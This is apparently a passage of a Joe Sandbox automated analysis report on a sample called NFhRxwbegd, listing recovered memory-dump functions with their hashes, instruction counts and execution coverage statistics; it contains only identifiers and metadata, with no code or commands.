                                                                      • String ID: iUfo
                                                                      • API String ID: 0-3820436262
                                                                      • Opcode ID: dc319b41fd9d29d02b829d3304b1e3d0e3ce29af4f88919c53af3fa65f091471
                                                                      • Instruction ID: d58c627efd5aed50c954e2adfd5c630d345df1925fd482ea2edaf25dddfc87d1
                                                                      • Opcode Fuzzy Hash: dc319b41fd9d29d02b829d3304b1e3d0e3ce29af4f88919c53af3fa65f091471
                                                                      • Instruction Fuzzy Hash: CD51F2B8E052199FDB48DFA9D9456EEBBF2FF88301F14902AD405B7254E7389A01CB94
                                                                      Function 06DE1440 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -2m
                                                                      • API String ID: 0-2686427999
                                                                      • Opcode ID: 4d3d510a93bd372ad4757b074547a455ad64615ee94b888d29f15e724fe50352
                                                                      • Instruction ID: e327c79d0e906381af0dcaa1909c1a124170171c6f2ef5cdb1e0a56b748d23af
                                                                      • Opcode Fuzzy Hash: 4d3d510a93bd372ad4757b074547a455ad64615ee94b888d29f15e724fe50352
                                                                      • Instruction Fuzzy Hash: 44512BB4E00219CFDB08DFA9D9406AEFBF2EF88301F24D02AD45AA7254D7349941CBA4
                                                                      Function 06DE8A90 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w7e^
                                                                      • API String ID: 0-1657886525
                                                                      • Opcode ID: 17554626920a377f390df431731ade4a3ec34557dc036a9cbb443a016b3bfed8
                                                                      • Instruction ID: a79541e05337f0ad3769471773f61ca0864fa08e80af73d689598e27e006767f
                                                                      • Opcode Fuzzy Hash: 17554626920a377f390df431731ade4a3ec34557dc036a9cbb443a016b3bfed8
                                                                      • Instruction Fuzzy Hash: FC4147B5D05219DFDF44DFAAC9406EEFBB1FB89200F14982AC416B7244D3388642CFA8
                                                                      Function 06DE8A80 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w7e^
                                                                      • API String ID: 0-1657886525
                                                                      • Opcode ID: 9a58e53d87794fcbcb0bcc1c848c77ffd917372d0a180b5297f4baf16757b3bf
                                                                      • Instruction ID: 3b6a2f6653af5efdfa58cac1a00a05529371850cd4cba9c4d0fe25d618cd8bf3
                                                                      • Opcode Fuzzy Hash: 9a58e53d87794fcbcb0bcc1c848c77ffd917372d0a180b5297f4baf16757b3bf
                                                                      • Instruction Fuzzy Hash: 7B4138B1D05219DFDF44CFA6C8406EEFBB1FB89241F14982AC016B7294D7388642DF99
                                                                      Function 06DE5588 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0ni
                                                                      • API String ID: 0-1488673370
                                                                      • Opcode ID: fc22e4488bcd3239c6436fa792da435db4c7f37e4e79935921f25104ddc0fa1f
                                                                      • Instruction ID: c6259e97535bc75dddf16340346cf80307de3bce36fdb00812fb0cf43b6def4d
                                                                      • Opcode Fuzzy Hash: fc22e4488bcd3239c6436fa792da435db4c7f37e4e79935921f25104ddc0fa1f
                                                                      • Instruction Fuzzy Hash: C8514A71E01618CBDB68DF6B9D4479AFAF3AFC8300F14C1BA850CA6254EB301A858F51
                                                                      Function 06DE5578 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0ni
                                                                      • API String ID: 0-1488673370
                                                                      • Opcode ID: 2143e60ac6b44e063b886754610b324ff5ffc156578f51decc4cee866ca32db1
                                                                      • Instruction ID: 5aef71ea98c76145e92bcb4c2ddad56e60092ddd33e2d1598225db0f63160c67
                                                                      • Opcode Fuzzy Hash: 2143e60ac6b44e063b886754610b324ff5ffc156578f51decc4cee866ca32db1
                                                                      • Instruction Fuzzy Hash: E9513B71E016598BDB68DF6B8D4479AFAF3AFC8300F14C1BA950DA6254EB340A858F51
                                                                      Function 06DD14A9 Relevance: .3, Instructions: 324COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6bd0ed32ada6dedf1b0a45081740f3a65cb0cc5d99721995d49d073eb4b3af8
                                                                      • Instruction ID: 545340d3dd08a7ec7f15d15ffef9af78886633ad66431a30c271c08474beec52
                                                                      • Opcode Fuzzy Hash: e6bd0ed32ada6dedf1b0a45081740f3a65cb0cc5d99721995d49d073eb4b3af8
                                                                      • Instruction Fuzzy Hash: 83E10A74E002599FDB14DFA9C980AAEFBF2FF89305F248169D814AB355D7349941CFA0
                                                                      Function 06DD3570 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 607cd5a72ab43167eefaec78b630f2721639c5276d84ebd9094b1e890132989f
                                                                      • Instruction ID: b843d3ecdf4311dd01fba2f34dc967f91448c18932ebc1ffa2e5a6703d6e8c7c
                                                                      • Opcode Fuzzy Hash: 607cd5a72ab43167eefaec78b630f2721639c5276d84ebd9094b1e890132989f
                                                                      • Instruction Fuzzy Hash: C7E10974E002598FDB14DFA9C580AAEFBF2FF89305F248169D854AB355D730A942CFA1
                                                                      Function 06DD2D00 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71f8f55e74cffbb7a2a845055474a815e6cbf586d0559a74d5d0914cf99932be
                                                                      • Instruction ID: 5862429aedfb2509149969e548b3a37bd2518d86e23a0de0a28ac38ebceefd0b
                                                                      • Opcode Fuzzy Hash: 71f8f55e74cffbb7a2a845055474a815e6cbf586d0559a74d5d0914cf99932be
                                                                      • Instruction Fuzzy Hash: A1E13674E002198FDB14DFA9C580AAEFBF2BF89301F24C169D914AB355D730A942CFA1
                                                                      Function 06DD18F8 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0dc7f287326d102e1dc5793078e77fcbf1d2e38cd924c7b3189c90323e8e2d7
                                                                      • Instruction ID: 174dea4f0ded69e58d4f67fb03a43b6559115c83a5bcc1669089443fa7e28dbe
                                                                      • Opcode Fuzzy Hash: a0dc7f287326d102e1dc5793078e77fcbf1d2e38cd924c7b3189c90323e8e2d7
                                                                      • Instruction Fuzzy Hash: 1EE1FB74E002598FDB14DFA9C980AAEFBF2FF89305F248169D814A7355D730A942CFA0
                                                                      Function 06DD3138 Relevance: .3, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e7659c7de623f2e3024871874f3de6080b78f21ba7501331b1f54a9d1354bed
                                                                      • Instruction ID: f0a9b963f5213ccb577e26d5496d1203bc19fbb3b043982e0fa8d125b8198cce
                                                                      • Opcode Fuzzy Hash: 1e7659c7de623f2e3024871874f3de6080b78f21ba7501331b1f54a9d1354bed
                                                                      • Instruction Fuzzy Hash: A3E10974E002598FDB14DFA9C580AAEFBF2BF89305F24C169D818AB355D731A941CFA1
                                                                      Function 00DFD404 Relevance: .3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 029c97497e063afc93de43518467e14709eb4b258f249d85a6220fba7671e09d
                                                                      • Instruction ID: c4e48d82dbbf1b7c173522fbbadcda8fc242ae46fa81c09e3bdda7727ca9f829
                                                                      • Opcode Fuzzy Hash: 029c97497e063afc93de43518467e14709eb4b258f249d85a6220fba7671e09d
                                                                      • Instruction Fuzzy Hash: 93A15E36E00209CFCF05DFA5C8409AEB7B2FF85300B1A857AE905AB265DB75E955CB60
                                                                      Function 06DE9FC8 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50bb32985b83148ea9e091ebbd0010bb69d34954497b6d976b0a2299ecacf146
                                                                      • Instruction ID: a55eeaaae4be214707fcc260fcda08d4f7bcd57014a627a57b1a08454a13ac90
                                                                      • Opcode Fuzzy Hash: 50bb32985b83148ea9e091ebbd0010bb69d34954497b6d976b0a2299ecacf146
                                                                      • Instruction Fuzzy Hash: EDB10871D0521ADFDB68DFA6D58059EFBB2FF88300F24D42AD019AB254DB34AA46CF50
                                                                      Function 06DE9FBA Relevance: .3, Instructions: 251COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03c2bdaf42da0ecaa41d8b5a5e316df2f7932ddb5bbc9b3af67246f3e62b2e18
                                                                      • Instruction ID: 57e116a31e43de0447b9a23f423b4b362354d12d7c8a6c5e76e724f4ce06edb5
                                                                      • Opcode Fuzzy Hash: 03c2bdaf42da0ecaa41d8b5a5e316df2f7932ddb5bbc9b3af67246f3e62b2e18
                                                                      • Instruction Fuzzy Hash: EAB10871D05219DFDB68DFA6D58069EFBB2FF88300F24D42AD419A7254DB34AA42CF50
                                                                      Function 06DE3BC8 Relevance: .2, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f1eef4b85d8b555ff035fa13f344b064beac68f59804d4d77cfab2d0ccf7343
                                                                      • Instruction ID: a5511fcba93108823c1fc6cf2af54de95f1d252dd325ec0d4b0c99aeab98e4a5
                                                                      • Opcode Fuzzy Hash: 0f1eef4b85d8b555ff035fa13f344b064beac68f59804d4d77cfab2d0ccf7343
                                                                      • Instruction Fuzzy Hash: E6811274E10219CFDB44DFA9D9849AEFBF1FF88210F259569D415AB220D330EA42CF91
                                                                      Function 06DE3BD8 Relevance: .2, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56812587881d0a71f5bbc46fad9ed8ad9a8b16954449ec336ec3d16a2deef810
                                                                      • Instruction ID: ec24c5e4e67bcd238476ce1e88b9a99470bc824d62c02343a932927e83c7e7c4
                                                                      • Opcode Fuzzy Hash: 56812587881d0a71f5bbc46fad9ed8ad9a8b16954449ec336ec3d16a2deef810
                                                                      • Instruction Fuzzy Hash: 5291F074A1421ACFDB44DFA9D5848AEFBF2FF88310F259569D415AB220D330EA42CF91
                                                                      Function 06DE8E40 Relevance: .2, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce020311102e1c967fe06a5feb2966a58476bf8155ec833ac917fb30c8ee0027
                                                                      • Instruction ID: 267b5ffef72838b81ec9c84c5702f91ae0ecc074a1c98adbdd1877530c4331d1
                                                                      • Opcode Fuzzy Hash: ce020311102e1c967fe06a5feb2966a58476bf8155ec833ac917fb30c8ee0027
                                                                      • Instruction Fuzzy Hash: 83812D74D012698FDB54DFA9C580AAEFBF2FF89301F24C1A9D819A7215D7309A41CFA1
                                                                      Function 06DE5118 Relevance: .2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7303ec1947460b9d5b17bb1354eae4ed4b19d6f1c3fa89ea8632109281719d1
                                                                      • Instruction ID: 1a0abeac147e64b2873acebd3b7b475efdc4067a0c1a4358c8974d9c9a653895
                                                                      • Opcode Fuzzy Hash: a7303ec1947460b9d5b17bb1354eae4ed4b19d6f1c3fa89ea8632109281719d1
                                                                      • Instruction Fuzzy Hash: 1E713674E1520ACFDB44CFA9D9805DEFBF2FF89250F24942AD415BB224E3359A428B64
                                                                      Function 06DE5108 Relevance: .2, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cfb4cf511deed530dcd1e85f7a644ffebcd734ae2ff855d643926afff1ae9ba
                                                                      • Instruction ID: e68b15933a539657fe30bd5fdace87e62eaa6d30b5460d1d6eb2dece04b21beb
                                                                      • Opcode Fuzzy Hash: 7cfb4cf511deed530dcd1e85f7a644ffebcd734ae2ff855d643926afff1ae9ba
                                                                      • Instruction Fuzzy Hash: F9714774E1560ACFDB44CFA9D9805DEFBF2FF89350F24942AD415B7224E3319A428B64
                                                                      Function 06DD2CF1 Relevance: .1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 060f7ae3304c92dd5e4a3d730e7b71a9b409ec5b515ddb6a0ff5ff4671ce712d
                                                                      • Instruction ID: 233cb14f86582b941b14123b3be1dcf6672cbb3896839dce1aa6af22ef8b411f
                                                                      • Opcode Fuzzy Hash: 060f7ae3304c92dd5e4a3d730e7b71a9b409ec5b515ddb6a0ff5ff4671ce712d
                                                                      • Instruction Fuzzy Hash: A2511874E002198FDB24DFA9C9805AEFBF2BF89311F24C169D958A7355D7309A42CFA1
                                                                      Function 06DD3128 Relevance: .1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e44ef8da310ef192ab7c41c75c361fe3950954c526df2f545610c757ca5f896e
                                                                      • Instruction ID: be74795cd6af534bdacef98df0ff01388182d95f0407c4b008796abe9b66f94e
                                                                      • Opcode Fuzzy Hash: e44ef8da310ef192ab7c41c75c361fe3950954c526df2f545610c757ca5f896e
                                                                      • Instruction Fuzzy Hash: A0511970E012198FDB24DFA9C9405AEFBF2BF8A304F24C569D858A7355D7309942CFA1
                                                                      Function 06DE4F00 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6fd6779f5d517f7bef2ef513607bfb9a27b2dd3603785b2d1b93c77cf4052773
                                                                      • Instruction ID: 260f6176e1c7829a9962c1c3aa069e6bcde37fa9219bbfa7915d7737821ba1cf
                                                                      • Opcode Fuzzy Hash: 6fd6779f5d517f7bef2ef513607bfb9a27b2dd3603785b2d1b93c77cf4052773
                                                                      • Instruction Fuzzy Hash: 3341FBB5E0060A9FDB44DFAAD4816AEFBF2FF88700F14C466D415A7254D7389A41CF94
                                                                      Function 06DE53A8 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b453b5c9a92acc859c36a7e4f130e7138edc74893623430a4bde4a4c5c63d24d
                                                                      • Instruction ID: 37a2773aad4499c0455a0910c26d84d9706272f79732ad7dbdc1367abc398350
                                                                      • Opcode Fuzzy Hash: b453b5c9a92acc859c36a7e4f130e7138edc74893623430a4bde4a4c5c63d24d
                                                                      • Instruction Fuzzy Hash: 104126B4E0521ADFDB44DFA9C5815EEFBF2EF88240F20C56AC505B7214D7319A41CBA4
                                                                      Function 06DE5398 Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a96ea024626e4b6d54f4ee8b255bc43b786ce8e3e3e9d7b1ae3254a4fdaec2bb
                                                                      • Instruction ID: 2920441ad2dd670487fdc8090c90d7317e0256226846a80ec70262f1d62f6578
                                                                      • Opcode Fuzzy Hash: a96ea024626e4b6d54f4ee8b255bc43b786ce8e3e3e9d7b1ae3254a4fdaec2bb
                                                                      • Instruction Fuzzy Hash: BB4139B4E0560ADFDB44CFA9C5816EEFBF2EF88340F24C46AC505A7214D7709A41CBA4
                                                                      Function 06DE8348 Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 407a08ab7672c9b86c3d46fb7e2cb981a3e1281bf9c7fcbeab554c5c932be193
                                                                      • Instruction ID: ad0c2b460843f6926ff10805c898b593dd17d541c5e48a2b4831a4220d5ad02f
                                                                      • Opcode Fuzzy Hash: 407a08ab7672c9b86c3d46fb7e2cb981a3e1281bf9c7fcbeab554c5c932be193
                                                                      • Instruction Fuzzy Hash: 2F412BB5E0660ADFDB44CFA5C5416AEFBF2EB88200F20D46AC119F7254E37497418B95
                                                                      Function 06DE8358 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afc431e83354c31e60070e0e8cd6035220c09b9d62313a87dee308239194121a
                                                                      • Instruction ID: eb8c07989554a273d54bd54f6614e33ff08ce8cc45993cd21e77459aa9626934
                                                                      • Opcode Fuzzy Hash: afc431e83354c31e60070e0e8cd6035220c09b9d62313a87dee308239194121a
                                                                      • Instruction Fuzzy Hash: 49413874E0520ADFDB44CFA6D5416AEFBF6EF88300F20946AC109F7264E3789B418B94
                                                                      Function 06DE4F10 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 553e3ef6cceabe35a59b84d3c045660b5a008a7b628bb260af8e5d50f0b45bfe
                                                                      • Instruction ID: 2813575b0fad6437d654e6de018eaf66405fd47fe0d2e1c696015e6f8ef25d6a
                                                                      • Opcode Fuzzy Hash: 553e3ef6cceabe35a59b84d3c045660b5a008a7b628bb260af8e5d50f0b45bfe
                                                                      • Instruction Fuzzy Hash: A041D4B0E0460ADFDB48DFAAD4815AEFBF2EF88610F24C46AD415B7254D7389A41CF94
                                                                      Function 06DE0007 Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2530e56a9777712f136726addd2c3fb1641c6cafb9ad65a432841b1dfb19ba1
                                                                      • Instruction ID: 7e14dec46a1276e52c53f11b3ca17ab51a577d85dc1d5dde7f391131954655fb
                                                                      • Opcode Fuzzy Hash: b2530e56a9777712f136726addd2c3fb1641c6cafb9ad65a432841b1dfb19ba1
                                                                      • Instruction Fuzzy Hash: D3314371D057448FE759CF6BCC0178ABFF3AFCA210F19C0BAC448A6165E6740945CB61
                                                                      Function 06DE0040 Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81c8b08bffbd43c7c0d0b7a2be86a74798ecef07fba899ba7018fb56339b8bf9
                                                                      • Instruction ID: f0cbdacc075de45d6095cf29671c7962a981e8edf1d8a1e78761f390ce121467
                                                                      • Opcode Fuzzy Hash: 81c8b08bffbd43c7c0d0b7a2be86a74798ecef07fba899ba7018fb56339b8bf9
                                                                      • Instruction Fuzzy Hash: E711AA71E006189BEB58DFABD84069EFAF7AFC8200F14C17AC918B6254EB740656CF55

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:5.3%
                                                                      Signature Coverage:8.3%
                                                                      Total number of Nodes:132
                                                                      Total number of Limit Nodes:9
